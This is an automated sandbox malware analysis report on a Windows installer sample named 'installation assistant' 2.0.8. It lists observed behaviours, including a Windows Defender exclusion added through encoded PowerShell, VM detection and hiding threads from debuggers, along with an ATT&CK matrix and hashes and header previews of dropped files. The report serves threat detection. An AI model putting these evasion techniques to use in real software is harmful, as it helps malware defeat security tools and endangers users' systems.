Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_0089AB2A GetSystemTimeAsFileTime,10_2_0089AB2A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 10_2_00930090 GetVersion,10_2_00930090
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation
1
Windows Service
1
Access Token Manipulation
11
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
1
Windows Service
1
Disable or Modify Tools
LSASS Memory321
Security Software Discovery
Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Service Execution
Logon Script (Windows)111
Process Injection
231
Virtualization/Sandbox Evasion
Security Account Manager231
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Native API
Login Hook1
DLL Side-Loading
1
Access Token Manipulation
NTDS2
Process Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain Credentials2
System Owner/User Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Obfuscated Files or Information
DCSync3
File and Directory Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Software Packing
Proc Filesystem35
System Information Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
DLL Side-Loading
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579795 Sample: #U5b89#U88c5#U52a9#U624b_2.... Startdate: 23/12/2024 Architecture: WINDOWS Score: 80 90 Found driver which could be used to inject code into processes 2->90 92 PE file contains section with special chars 2->92 94 AI detected suspicious sample 2->94 96 Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet 2->96 10 #U5b89#U88c5#U52a9#U624b_2.0.8.exe 2 2->10         started        13 cmd.exe 2->13         started        15 cmd.exe 2->15         started        17 31 other processes 2->17 process3 file4 86 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, PE32 10->86 dropped 19 #U5b89#U88c5#U52a9#U624b_2.0.8.tmp 3 5 10->19         started        23 sc.exe 1 13->23         started        25 sc.exe 1 15->25         started        27 sc.exe 1 17->27         started        29 sc.exe 1 17->29         started        31 sc.exe 1 17->31         started        33 27 other processes 17->33 process5 file6 72 C:\Users\user\AppData\Local\...\update.vac, PE32 19->72 dropped 74 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 19->74 dropped 98 Adds a directory exclusion to Windows Defender 19->98 35 #U5b89#U88c5#U52a9#U624b_2.0.8.exe 2 19->35         started        38 powershell.exe 23 19->38         started        41 conhost.exe 23->41         started        43 conhost.exe 25->43         started        45 conhost.exe 27->45         started        47 conhost.exe 29->47         started        49 conhost.exe 31->49         started        51 conhost.exe 33->51         started        53 26 other processes 33->53 signatures7 process8 file9 76 C:\...\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, PE32 35->76 dropped 55 #U5b89#U88c5#U52a9#U624b_2.0.8.tmp 4 16 35->55         started        100 Loading BitLocker PowerShell Module 38->100 59 conhost.exe 38->59         started        61 WmiPrvSE.exe 38->61         started        signatures10 process11 file12 78 C:\Users\user\AppData\Local\...\update.vac, PE32 55->78 dropped 80 C:\Program Files (x86)\...\trash (copy), PE32+ 55->80 dropped 82 C:\Program Files (x86)\...\is-596QU.tmp, PE32+ 55->82 dropped 84 3 other files (1 malicious) 55->84 dropped 102 Query firmware table information (likely to detect VMs) 55->102 104 Protects its processes via BreakOnTermination flag 55->104 106 Hides threads from debuggers 55->106 108 Contains functionality to hide a thread from the debugger 55->108 63 7zr.exe 2 55->63         started        66 7zr.exe 6 55->66         started        signatures13 process14 file15 88 C:\Program Files (x86)\...\tProtect.dll, PE32+ 63->88 dropped 68 conhost.exe 63->68         started        70 conhost.exe 66->70         started        process16

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
#U5b89#U88c5#U52a9#U624b_2.0.8.exe0%ReversingLabs
SourceDetectionScannerLabelLink
C:\Program Files (x86)\Windows NT\7zr.exe0%ReversingLabs
C:\Program Files (x86)\Windows NT\hrsw.vbc11%ReversingLabs
C:\Program Files (x86)\Windows NT\is-596QU.tmp0%ReversingLabs
C:\Program Files (x86)\Windows NT\tProtect.dll9%ReversingLabs
C:\Program Files (x86)\Windows NT\trash (copy)0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-0UBJM.tmp\update.vac11%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-8CG2N.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\_isetup\_setup64.tmp0%ReversingLabs
C:\Users\user\AppData\Local\Temp\is-NMMH5.tmp\update.vac11%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.214.172
truefalse
    high
    NameSourceMaliciousAntivirus DetectionReputation
    https://aria2.github.io/Usage:#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drfalse
      high
      https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU#U5b89#U88c5#U52a9#U624b_2.0.8.exefalse
        high
        https://github.com/aria2/aria2/issuesReport#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drfalse
          high
          http://www.metalinker.org/#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drfalse
            high
            https://www.remobjects.com/ps#U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2051170851.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2050682545.0000000003620000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000000.2053270375.0000000000D01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000000.2073520799.000000000087D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.drfalse
              high
              https://aria2.github.io/#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drfalse
                high
                https://github.com/aria2/aria2/issues#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drfalse
                  high
                  https://www.innosetup.com/#U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2051170851.000000007ECEB000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.exe, 00000000.00000003.2050682545.0000000003620000.00000004.00001000.00020000.00000000.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000002.00000000.2053270375.0000000000D01000.00000020.00000001.01000000.00000004.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000000.2073520799.000000000087D000.00000020.00000001.01000000.00000008.sdmp, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.5.dr, #U5b89#U88c5#U52a9#U624b_2.0.8.tmp.0.drfalse
                    high
                    http://www.metalinker.org/basic_string::_M_construct#U5b89#U88c5#U52a9#U624b_2.0.8.tmp, 00000006.00000002.2243005612.0000000004579000.00000004.00001000.00020000.00000000.sdmp, is-596QU.tmp.6.drfalse
                      high
                      No contacted IP infos
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1579795
                      Start date and time:2024-12-23 09:14:43 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 10s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:110
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Critical Process Termination
                      Sample name:#U5b89#U88c5#U52a9#U624b_2.0.8.exe
                      renamed because original name is a hash value
                      Original Sample Name:_2.0.8.exe
                      Detection:MAL
                      Classification:mal80.evad.winEXE@128/32@0/0
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 76%
                      • Number of executed functions: 28
                      • Number of non-executed functions: 76
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe
                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 20.3.187.198, 13.107.246.63
                      • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtCreateKey calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: #U5b89#U88c5#U52a9#U624b_2.0.8.exe
                      TimeTypeDescription
                      03:15:37API Interceptor1x Sleep call for process: #U5b89#U88c5#U52a9#U624b_2.0.8.tmp modified
                      03:15:40API Interceptor27x Sleep call for process: powershell.exe modified
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      bg.microsoft.map.fastly.netfiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                      • 199.232.210.172
                      p3a0oZ4U7X.exeGet hashmaliciousUnknownBrowse
                      • 199.232.214.172
                      lKin1m7Pf2.lnkGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      fKdiT1D1dk.exeGet hashmaliciousRHADAMANTHYSBrowse
                      • 199.232.214.172
                      #U5b89#U88c5#U52a9#U624b_1.0.8.exeGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      Support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                      • 199.232.214.172
                      #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      Rechnung736258.pdf.lnkGet hashmaliciousLummaCBrowse
                      • 199.232.214.172
                      Company Information.pdf.lnkGet hashmaliciousUnknownBrowse
                      • 199.232.210.172
                      No context
                      No context
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Program Files (x86)\Windows NT\7zr.exe#U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                        #U5b89#U88c5#U52a9#U624b_2.0.6.exeGet hashmaliciousUnknownBrowse
                          #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                            #U5b89#U88c5#U52a9#U624b_2.0.7.exeGet hashmaliciousUnknownBrowse
                              #U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                                #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                                  #U5b89#U88c5#U52a9#U624b_2.0.5.exeGet hashmaliciousUnknownBrowse
                                    #U5b89#U88c5#U52a9#U624b_2.0.4.exeGet hashmaliciousUnknownBrowse
                                      Zt43pLXYiu.exeGet hashmaliciousUnknownBrowse
                                        #U5b89#U88c5#U52a9#U624b_1.0.9.exeGet hashmaliciousUnknownBrowse
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):831200
                                          Entropy (8bit):6.671005303304742
                                          Encrypted:false
                                          SSDEEP:24576:A48I9t/zu2QSM0TMzOCkY+we/86W5gXKxZ5:Ae71MzuiehWIKxZ
                                          MD5:84DC4B92D860E8AEA55D12B1E87EA108
                                          SHA1:56074A031A81A2394770D4DA98AC01D99EC77AAD
                                          SHA-256:BA1EC2C30212F535231EBEB2D122BDA5DD0529D80769495CCFD74361803E3880
                                          SHA-512:CF3552AD1F794582F406FB5A396477A2AA10FCF0210B2F06C3FC4E751DB02193FB9AA792CD994FA398462737E9F9FFA4F19F095A82FC48F860945E98F1B776B7
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.6.exe, Detection: malicious, Browse
                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, Detection: malicious, Browse
                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.5.exe, Detection: malicious, Browse
                                          • Filename: #U5b89#U88c5#U52a9#U624b_2.0.4.exe, Detection: malicious, Browse
                                          • Filename: Zt43pLXYiu.exe, Detection: malicious, Browse
                                          • Filename: #U5b89#U88c5#U52a9#U624b_1.0.9.exe, Detection: malicious, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9A..} ..} ..} ...<... ...?..~ ...<..t ...?..v ...?... ...(.| ..} ... ...(.t ..K.... ..k_..~ ..K...~ ..f."._ ...R..x ...&..| ..Rich} ..........PE..L....\.d.....................N......:.............@..........................@............@.....................................x........................&.......d......................................................H............................text.............................. ..`.rdata..RZ.......\..................@..@.data...ds... ......................@....sxdata.............................@....rsrc...............................@..@.reloc..2r.......t..................@..B................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):249984
                                          Entropy (8bit):7.999215745260699
                                          Encrypted:true
                                          SSDEEP:6144:Dnbtt5aahwi4Ulbr03HqdUCN6/MTiaTbGyT3t5SNbmMMnfrQQn1:7bz5aEwnUlXdig1GOqMnjQk
                                          MD5:27553992B3783B5FA91E0E458FDC0EC6
                                          SHA1:4B9942712CA58096EDC8EBF6C2768118D484D642
                                          SHA-256:085A6E2610BAB0693097B27904CCFAD2653414660196498904013DE4E2EDA58C
                                          SHA-512:A695CA377F745EF09A8DBBA1A8513D7C76622A7112ABCC37120BBF430866B2BDE09056CAF6A25F49AFB0FC6C8951FD9DA4AA952AD466CFFCF571DB366BE3B03C
                                          Malicious:false
                                          Preview:.@S......:..,..............Q.5..]Y`W;>I1.........e..V......_D%{...Kgh"-....gp....9r...Y...YUa(...<....<.^..8H..^.Gy.${.%..~..k.v..B.....GWQ...I..n..b.DL...38...3..?" ..E.\..%....>...........)h./.\......._..6..;. ....&....%S?ci.....v.4..[...!.g.9*:;H......L......XDE6"..^..o.7.sa.(......O.B.R.$...'1).U...'.L.@.Q..b....=s.^.H...v.:-...h_d...?...l.Q......(....L...@x..>.f.Y..W.........8.y...m...#...a...............oK.U..*f...5.....7\r..5h...s...V...L.s..`ulZQ.Q'tt...._...x...3/T.=Y.@o.....H>..nZJ.....u.........|9.D8....V..O...Vn.0...P.."....+.k./...*...X_...O...q...h.....8..x.......:..u.>;../.. s.(..;....~.....4....\"..f&.7..D...v:.f ...[...2.A...k,..\....E.}.\...9a.....L.N.W,%...Hj.r)..X..G?.,fZ..p..p....s.1..q..f.:9..8>.......&...r....{.N.......;gF....}....S...AP1e.U-...:.....`.....J.<..}.....T.N.c..8..D.un..!./.....%9Ir.......b..[2.]..6...p.5.,6..N..._b....:.n..=.....)..E..gM...Jx}.Rev..0'..F2.......\c$Cf.ebv.8@,'.....j....e.
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):3598848
                                          Entropy (8bit):7.004949099807939
                                          Encrypted:false
                                          SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                                          MD5:1D1464C73252978A58AC925ECE57F0FB
                                          SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                                          SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                                          SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 11%
                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                          Category:dropped
                                          Size (bytes):5649408
                                          Entropy (8bit):6.392614480390128
                                          Encrypted:false
                                          SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                                          MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                                          SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                                          SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                                          SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):249984
                                          Entropy (8bit):7.999215745260699
                                          Encrypted:true
                                          SSDEEP:6144:Dnbtt5aahwi4Ulbr03HqdUCN6/MTiaTbGyT3t5SNbmMMnfrQQn1:7bz5aEwnUlXdig1GOqMnjQk
                                          MD5:27553992B3783B5FA91E0E458FDC0EC6
                                          SHA1:4B9942712CA58096EDC8EBF6C2768118D484D642
                                          SHA-256:085A6E2610BAB0693097B27904CCFAD2653414660196498904013DE4E2EDA58C
                                          SHA-512:A695CA377F745EF09A8DBBA1A8513D7C76622A7112ABCC37120BBF430866B2BDE09056CAF6A25F49AFB0FC6C8951FD9DA4AA952AD466CFFCF571DB366BE3B03C
                                          Malicious:false
                                          Preview:.@S......:..,..............Q.5..]Y`W;>I1.........e..V......_D%{...Kgh"-....gp....9r...Y...YUa(...<....<.^..8H..^.Gy.${.%..~..k.v..B.....GWQ...I..n..b.DL...38...3..?" ..E.\..%....>...........)h./.\......._..6..;. ....&....%S?ci.....v.4..[...!.g.9*:;H......L......XDE6"..^..o.7.sa.(......O.B.R.$...'1).U...'.L.@.Q..b....=s.^.H...v.:-...h_d...?...l.Q......(....L...@x..>.f.Y..W.........8.y...m...#...a...............oK.U..*f...5.....7\r..5h...s...V...L.s..`ulZQ.Q'tt...._...x...3/T.=Y.@o.....H>..nZJ.....u.........|9.D8....V..O...Vn.0...P.."....+.k./...*...X_...O...q...h.....8..x.......:..u.>;../.. s.(..;....~.....4....\"..f&.7..D...v:.f ...[...2.A...k,..\....E.}.\...9a.....L.N.W,%...Hj.r)..X..G?.,fZ..p..p....s.1..q..f.:9..8>.......&...r....{.N.......;gF....}....S...AP1e.U-...:.....`.....J.<..}.....T.N.c..8..D.un..!./.....%9Ir.......b..[2.]..6...p.5.,6..N..._b....:.n..=.....)..E..gM...Jx}.Rev..0'..F2.......\c$Cf.ebv.8@,'.....j....e.
                                          Process:C:\Program Files (x86)\Windows NT\7zr.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):56546
                                          Entropy (8bit):7.996595860667214
                                          Encrypted:true
                                          SSDEEP:1536:/lBrxiashuLNO1AXWcsxlym3ti9dYMiws64CC1:tl09uLN9XWcsGWMjQ
                                          MD5:BED02A7F3595752B8EB5F0BA75FC4049
                                          SHA1:972F9A2F3D7F2013AEA0301C9D59FCBD28D28D17
                                          SHA-256:BA10B5E5CE9E4E9C365CF935D44445C55915627F4E064A4D562B99DD716EFA01
                                          SHA-512:383AE35A3D3CB74F8748B5F7D2A637FF2F381ED6FC2AF42A751BA3A4DC10DDC009EFE76942312A385F4184D717BD73A0121225E5C9963D94652BBA161F7331C9
                                          Malicious:false
                                          Preview:.@S....,.?pl ..............|.$...v.....Kb{.{-..(P|bY...`H.5...S_k.9y_.oL...>3.^fq6K...r.>ju.......oc...r..|Rr.4C}h. ..T.\.n>Xq...Z.W0..Z.......=..z.y{.B..c.."..c..qJ.R..p....7.(5......K..g8y.~.....kam.1Op..N..z..n.../..R......3....m.....P%..Lo....3.I.j1..X....q{x5.r.!..N..V.&..O.n.u.N.O.f.O..3....rm..t.....w...CuH6ZrL..E...wUe.........{.a.F...#r..?Z.i...k...|d.. .C.G...Y.d.]....(?e.&....9......0..5.........]......3..r+.qV*1Dn.........#.qc......R.yz4<..8..@b.zR...-(...z..ZL_ >.d......3...8P.f.....;.....L.S. .w._..]...[9$...?-j..P...a.....bX~!.1..x...3.Q..%..#N.;.dG...I9...@l..lf.wB......z....4.B.<...88....~L....$.x.Y.h.hm.|Vz...LjR{`.....GC.O.....Y....O7.....Q.XG@+%..P..=MQo..2{.JE..c..2M......#-...d|y..t.A.n|..o........q|...c`.s".Iz.|s.TFa...s}j..|q9.....eE%{7...?L=..K.pG6..&?.`;o..a.+.8c...S.IF.%...L..O|..yX.5Wm}..;b..tu1...:..5F9.v....Z>{D..........D.e.8..o..kD...[j...<..L...;.-.........1LV.3`Y..I....BTx.yYZb...&...F..&....L@.TH.&.n(L......>
                                          Process:C:\Users\user\AppData\Local\Temp\is-ANRVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.8.tmp
                                          File Type:7-zip archive data, version 0.4
                                          Category:dropped
                                          Size (bytes):56546
                                          Entropy (8bit):7.996595860667213
                                          Encrypted:true
                                          SSDEEP:1536:mj0GkM8N47lyeF28eFwvcOcSi2d+9XRy9bCoXVDnCk:XFN4ByE2vOfi2dOIbBlD1
                                          MD5:C929E760F67447FA177B07396506CB37
                                          SHA1:38B24E181AB4FE7D2A4561B7981C52213C711703
                                          SHA-256:21BCE6971B29976BB17DBC49E5E918FAE4004221F2B38E12B592960F1AA3C336
                                          SHA-512:A51DFB40B70AA47278D094C33470F4450302FFCA2558E7397F1C31B46EC174D644BC1112C86B20762D87E7BFCC5046C15DFA8FA56F80BF2A8A31BE8947F70029
                                          Malicious:false
